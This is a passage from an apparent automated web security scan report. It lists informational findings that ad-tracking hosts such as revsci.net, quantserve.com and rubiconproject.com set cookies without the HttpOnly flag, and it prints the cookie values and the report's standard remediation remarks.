rtc_9kxA=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:45 GMT; Path=/
udm_0=MLv3NzMJZjpn3hc5wFS8IC+r63dQ4yV9iELcnt71VAcNP2TS4VlY4qSUGIOcGZlUB4SruQLl9XR5YWUgVeRUU77T0dB9naIjMHUteEdll6CqndD77KDwanYyeIPEsromGmlbIRKUEZS8jq4WxhsFj39udeAFFAknY9O3Tf4J3+kK705f7d7TOVG1VssiqLhWRKH8zB3RhDIGHZ8tevRe+ZcG+Tk9uXoVQNelb7K4ea6fuMFUkAPu8Pjr7YUal5o+TRzZj9/waTAca6i2pP7y+DrGqQJ442yc4kq2MARSn29yPdLLQaGxYVRsuQItBsfhjPjts+0YduGeKButufXSv9LYpMBuMJFS29bADyVNqa6cOaTxpvTZDPGWL61WPK0GBV/ewh6UyFmlzI+LcHSMjocG7Jts/iygOUJSrVWZygHqUtXHSFjSc76m9hY+gTAcVQNd1h2qv5b5xmjKRPMMB2vmOCBHBrPFEnnulNloRpx6IuUCwSQd5sQUNxbCpI7j/BCeLazR+m05XRiPCjAw/sLTpUL65WqpY7F8GkLz+azI+9ft/52THWJA0Ur6fXgFE3xvpgNd6hv13xC5WMsRpa5Vxv1Ney0PDTVjzuZPaHnnRGTTGLv9OAzLlkI/lvjbLO9cJJ/ZCoKwMDZwzDQMjFqQpUQwJHPPViweNNMPNSxRrf8NdCF7eY4IFn5MI0hukpZdP+mcCFO/9u5gzpGLuKQwXQ6WvTWKi+LOr+0H1rEJ+HRy/sTaSgPRzTf1vcEL9TmpK/6tQ5Tb0ENzqfVqrIes/Lv1c+cuPXd2aNrMJc6zQNbP8lgOSMdqftReq7X4LkuqQiW2womb6EnfPjUhLBWa4j32mzc+bMyM8r35es1O24x0W1POv/N3z63mno0VRICkl1ISeXy7l25e8FlFOF++cUQ6MAif5q49Tu3VzcqlhTQfBKAKMUxZqYDRpXbSqO/Lp1X9kRZfbvd4v0XoDpXmpKAYoIj8H9E3MZql03Qw6bhPivuDhTq5BruzECG4FTzkqRTpEdmL2eGV77DOx4wWGGvJpZ+Zpf0cndeNSsBbERulBkrtegdxjK6HgZJ6IB1ETlSzOLAezrrHyZxx+FWVvRbbvRY8j93s/aqVKkrLl+Jjtt/NsLVttpnoNn64gETVXp4q0FeBbHTixP2vr7GjDRviF9xcJSeCt5C5+BcSAOfhHxXQ0O6FJbTDYn33L9BexlXTvxpBPRoFoMWSSFUjtvxqHzhCqGuhdxOMUM/oAqP1UqkouPaSIhiyXov8mnO2vRxd3iG3/mZXbn7ocz976yf3pqw2FH7lIoeo8aREOVrVQGE53MCact/SOv0jXCjdyb5XW9mpBVgrSK2Jw9DEDWntbpoKb7bJY41tEe1a0QZHeb2HJfM1T4nXkqTkVir2Vt+kjxzNUkOK96OTA6Tcx9+YNSnc+IYwXsTPJ5oZocckG6NhFHW0puH3pDKCS1Tz6RmeF289+Q6dPSjIrDQOESfRRXah1JiGz6dr5+Slj9jMQ9ji0RwjXBosKA+hK9FYt9f8pFTLvV2tvAn9tszj4NSpcMqN+Uq1hF2OcCw1frrs6wl0ddNz7XGuoibEBQ4rvG/oYzzbYjU2t1QjL/XltVJFx/hM927IBi2S+Ha1IZzca/Yl8Gf8AoZSMFHxZZEsSNEncvVHQhezA5K/ty2OvHNtnWqUqsLJgHXPXM5bpxtI0O9vbu83KOYKuogOWLcCcrKhUu+pMkSh1FwNKcWITb+Dq1swWctNgQLNisE9il8Ax/tz; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:45 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.144. http://pix04.revsci.net/H07710/b3/0/3/1003161/554831275.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07710/b3/0/3/1003161/554831275.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MmhOXMMpjaBv3Bh9uxc4xrMriSJbZsgJmILMDUmufM9tNd4heJ7St7GX0DL0+fSLUTLoEm+Lgqh8P1UFkgJne7ZsOV6Ta1iuv1MzhmYhirHc/Hg4emnRkQiJyODMbw1LI67VP6jyT9H+Vu8imVtfewvZBiSnz4xalQVQYQWZHho33J8VSL//eihmZmQwg8GB3pzT6R4US7aShMFmG4Ctj87cLP7x8ykvNYOj8JjFiA2bx5/wsk+wcpVASrVvAqbFYixb4BTysfLvrp54sPQqfvv2qUGM1bx+CXDqmENqpRULiJ2hkb4NR7dWDDYzr6VgixY+eZtYUoJDHhKniAHbNTkZjJ4xM/paAPsLWLBKuaceuSA+v95s0MBcl7olnK3/TrZgcO+i4pWN/4d9UkqTT6h8PiIWDdly8STZq+P0DOG8ZdVc7BWNdCFqdEJoL43svmqhUHjpL0O5PRvajJE9TLYndlrtTsW8QZPEsrADxN1SLAvHPBpF6zrCIKNga6jMOLv6gOPdQgcAl2Nu4/L0VlD+1dFUpyE6Kf55xZrh4988vaC7FCvvrzYnOzxd3ej16GXnZ3CffZ7nP1piX8BiOYZMkMdIYCIAtLdxqlElFhHh+zW2Y+mN2GT7RmtcFpzvpUTK5i8BSBzlUVdvYrROy0=; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:37 GMT; Path=/
rtc_imR1=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:37 GMT; Path=/
NETSEGS_H07707=82f4957c1a652091&H07707&0&4e1addb1&0&&4df433b9&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 11-Jul-2011 11:25:37 GMT; Path=/
udm_0=MLv3NzMJZjpn3hc5wFS81/H1SzcDYOhIvxMJqN1IP6F6114LYC9oZ++Kg6mfGZlUB4SruQLl9XR5YWUgVexUU77T0dB9naIjEG35bFZpiOLnlDdGTCH0anYyeIPEsromGmlbIRKUEZS8jq4WxhsFj39udeAFFAknY9O3Tf4J3+kK705f7d7TOVG1VssiqLhWRK38zB2hkrdv3xhH5C18JIEzrVfJ7OrBd7qc2wgPbQ7YF7hgeFC8L0yhPZXcBaFO9d8zkKTgfqjf/gPrBrSuLVMPBdPtqGGFqW/rScn+f2NyybirTIELYXPhl1lcM7K7EUyiEqFd9bweR9wPi7ExFdk9mTGHzPt+/CUM1kH3iQAFxJjIAvE7LiyAQAdlkgZQ0/Y4qtcARP2ZsXsR8+0Xie/SJRzvKN2IV5H4Hf38scui+KSPdf+44AiYo0EvEdPZGtvlPF+btZqvsm0yaUHPM2S4SyB3SA8zx9AmGT3tdIXl28LQq8W+Jw759OwqUNnBinnJvwjch3Uy/ziNDnXlpQlOUKWCF+7FMNWx+jiGEBeL128CxR9Ve7bk2/qHMSIpenGnkCmNA3wEA7iAYh0sU0XpmYGFYrIqWTSiSszv9GpWeSAavobBof/LzMp2HwcDN5Wjpu9OrFzEciMgSmQZui2dEu2ifbPb7aV7JQppNbJd8YY5pD2iMJft7eb9dHplilmuJiD++CsYwpQsHIzbAFWkaa9ZHuT4W4IKXgfvwQNqx7Pg10+Y7jkd6bRHlqW+0/qF4gbFbA3I2qwFI4fj0ZiIiRYi88MGVGyLnKcRU6e9cTg2oHjMfClFb6H4ZQ5XQXQbTUOIsJ0aP3wlL8mb8boeOsmqg/dK5TfnrpWl95b2pika9uYwjrdXt+3nno3VRDQpDDOLklHggH4gOBAs0wzTdznhALOoYj3SCnUIB03orcqMp9ak9/gx3LbD4nsL8kNPLA7ZnoIobXuRMK1RGq4hY2cG6cYZm5Mvf7oo7zZ6VELFkh7rs4MA8QgZsj8y6FF1HEIEvN/fgiI+Wij+yAMgMhKEcsVibrEGpqRLBnP4YjliPjiRiQRE9c5vTBreNR00oDO9uFdzpIsIyP4HHE/khmLThcSKZKKH+5+OPLAUnUr+/ZeBjcbc3tAKSuUrNkwLuNEKYPAfs6g4VoRjM2wNhfs4Xq6vQScQDzlW/jtWiUJKZhQmfrlufldv3r5FMG+pktQGqTNU89AFMnw53WaiUATasvqtt86OPxCyXMeqG3xoGKdF9y8YobGJcvDv3G1V/d6F12pAJBoykm60am/2kA02Xex/E9MgHL39M9M24HkqBAZpudBU8NCQFV1BzDkoGhLL6zUV+DhCKCrR2whYJHCggpMYKejEznGJYnwUva35PctcwaLHSOcSr1CjMPcHjOqzAQPso/vxmymRP91TH6Gz3m3Vs68Haupwzn9YrVuZ9e+CIWKyRlDIUf3/JjujwWA1UfX8ond66OQ0CkfYcD5wgq+2m52ayBnQ45aS0BtapiNMQcL54ySuN+Op0XObPdQNV3zmiFahFYTxFxHa0gFNhXdLu9OHHZOu1SJAPjeS0pA7ZHIDZXA29B8GK2iDlmPDGbXnH3B2J3lCsKNE3v83dCdzUlQp1yaymlblZzbPNcJFnHEC46TrJP81Nr4J0KF6oTH07Yo8tZpAf1ODAm9Ozlq1D2PD6LLqg4K9I8/F+k8eRgYtRD1C7LW+AsGTtfAjBkj8BSHUBhqGiim3OMyowQb10jUNrWUzgxTYiGeBTvvk; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:37 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.145. http://pix04.revsci.net/I09839/b3/0/3/0902121/61203636.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I09839/b3/0/3/0902121/61203636.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MmhOXMMpjaBv3Bh9uxc4xrMriSJbZsgJmILMDUmufM9tNd4heJ7St7GX0DL0+fSLUTLmEmwLgqh8P1UFkgJne7ZsOV6Ta1iuv1MzhmYhirHc/Hg4emnRkQiJyODMbw1LI67VP6jyT9H+Vu8imVtfewvZBiSnz4xalQVQYQWZHho33J8VSL//eihmZmQwg8GB3pzT6R4US7aShMFmG4Cin3im/BWv6yFReAkWBsEPdpYNcWyvDqqrnxlZZDKHJC4T+B4HODv/HJ1MLMTKLDPZ0QU3pMIyAxsUIWT8mICGsLOcWmdhqaEBzvYPOSJj9WnbTNOFR7erYJlTe5vqg+nh7RGPSoFfWPOKKA7eIQc0s3cZlY/cXec9PTKBB3c9EYPqrXEQq2Q0xXPhSvvm0z3G3fT464on9jTU71pl5AYGUbs4WM4OQkRXWS+0a/nigHuUv1xHdo2a6bSKSKIb/0GyOZosEwZGpyl6bHp1kzYthmcSdk8hKB0K5O+mZK0aPMFj2roV9o9cqR0AOQ2tocmyoUJ7tyDwddA+5QR/KozVe66ER8T/jt1d6+8MX6nNkHtR7+GesgMMXOsP+b9VIgBA87ZrYflyi2FVT99x9GYMttPMy+zevVH2acul11RVwPQBtE7owiVQ3MF3r1cv2OiOyE=; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:24:00 GMT; Path=/
rtc_ATjy=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:24:00 GMT; Path=/
udm_0=MLv3NzMJZjpn3tvXN5qKIC+r63dQ4yV9iELcnt71VAcNP2TS4VlY4qSUGIMEVAYaUgmC7NU5revyXGNDe6v94gej2Ll1GWFFI2dH8k8lH1Ff21rKYxBzEbfkIA6N1ceTv+CvvfjLsErHWoX5Gbjv2eZyB4ELvHcydkAB+4bsC1I8le8u0u2Nd62YKRy8fcbsfFXXvRnUvaThTv3rzkv5CspRh2AzR6Aq9AyCgdVUZt774IR6jHsRIBaMVZ2/xLS2qb7AHJHICWQ/NvbFV5Egx+drUzogzecJzP1F9a7I72Rys3wYTJFG4RinOPTkqIgWX5YFQgf/NKLe8L9amhNQwFzPB81z8oqo73xqWnOsn/fJsgbUsHNKqwLLR9J8JdJ7OKKrHbFOHKcHjwneMvgXl68SpRzvSN0JVpH4Hf38scui+KQPdP+44AiYo0EvENPZHNPtPF+bsZqXUpOymEDNNWA4SyB3qM4zx9AmmT3tdIVl28Dwy8W+Jx7pdO0qUFnOCnhJsABSm88OzwmOSOPO1QlKU6WCV+6lMNW5ej+BEAeTt4/CxR5RfLbEIJXMNeszvYnggs/CpF6rtt+XdK84ARx9U7ptksbISkviNi5gh+Q5kuui32Mq11E0BU1Omq20x7z02L88yBbkTNLnd9QGDFmUpXQwHHPPVCwcONPHOixRrf8NdCD6eo6Iln9PJEhpkm5dP+ncCFO/8C5nzpmHmIQwXUoYgEQpDKK2DqFIM5I0LPFuzwam8tGmCsqpj3nSMUSemS4ddro4IHbouqYkBZKb3PvFcweuPHX2kdvMJc67YNbP8FoISMdqftdea7X4LkuqSrXLpkGZRyor+87U90qdc9TPuDQ2aMyMMrz4e41O2ox0W1POv493D35oj/Q9OfwwO/G5RQpWrl7cqLP+BasJf8NXYcXHahoNm0WzkkJzPTGroDv4e/GgHuLnlJG5RxtWe70Vn6qHa2OCQswMVPfVkZYTCy6VlfcXZ7oo7/d7NEJFnR7rswMA8QgZUj4x7FV1HKIFvF/fguK/WyjOyMPh8hKEMqG67zMHplbxUSMxgYT1myVPFa53tz2mZYu23+IrOg/UHvaMCXUsRZhh6FWVrSbbvRY8j93s/aqTJkrLl+pjtt/OvKVtVmBpN3++gFjVXp4q0LmGbHTipP2vL/GjDRPiZ9yx49irzr2r0onHsl1Vjr/Cwkuk08ERklhyhwMHLxkJ6YQXGpes1+sMBwXp8CGGGdM2+0HzAka7dzGwrNBbBs6J01OG9x/tDIPZljHDG5gsF+COVZbJf053d89jdm154jmkvlNpWdZSIHdFFtOHvRgA1/PKM8aLL1HmFEuQwCvlv9MG89tdgRa2UuyxZSMa1cESib+FfYMS2kuJaXtUHegaBknXyA7vaG45OpdEeqF3jXrfWHHT8AxqowUMDaiPf4aGn2Q6LDAANMyC6Sne+nBs7ov91EPV8J58LciHAS7kVJuDKDnLsaAPFHJ648njM/zqsa4QGM8fGHnMO6qxFa1n5bvWAMaIYhHpE6uYW/PM8O4xn3d2q6/8X0aG5+ltW70guqCRrp0YlT1I7cns/cpycCZ+JXxVHlpQRG0WEHmrNIs4SIjneCtxFv1zPKrC5XjhYvrEoETpGXAlXNUVSzJzF29KqRnFwzhNK4vvDwHPPEkpJ5z5kbXqD/iKFodzrHoLyV0xo3gsNgoG21UzMmA/dKjA81DNpwgOWLcCArKhUu+pAkSh1FwNKcWITb+Dy1swWctPgSJNis01jl/5Zvo7; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:24:00 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.146. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dp_rec="{\"1\": 1305981628+ \"3\": 1307964066+ \"2\": 1307963584+ \"4\": 1305981633}"; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:06 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.147. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EOsBrAEB_QaBtw4YmjhNoYHKOzi1w5bRg9TqKDCCAQAAAvwR6CC-Js4YHtF2sjAOEQcB0R4TANH6HhuC0aXhQDBQoQPRThALg7O1w6gdHmwlsunS4RLaTxmH4Q; expires=Sun, 11-Sep-2011 11:01:22 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.148. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-e4m3Yko6bFYVc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EHcBuAEB_QaBANW54uXPPR2hgco7OLXDqRtvGn6ClApAALIMIA_BsuggjhwuELbRzhge0XayMA4RBwHRHhMA0foeG4LRpeFAMFChA9FOEAuDs7XDqB0ccOnSpBDaSUmH4Q; expires=Sun, 11-Sep-2011 11:13:31 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.149. http://pixel.rubiconproject.com/di.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/di.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rpb=3580%3D1%264222%3D1%266811%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1; expires=Sat, 10-Dec-2011 11:22:18 GMT; path=/; domain=.rubiconproject.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.150. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

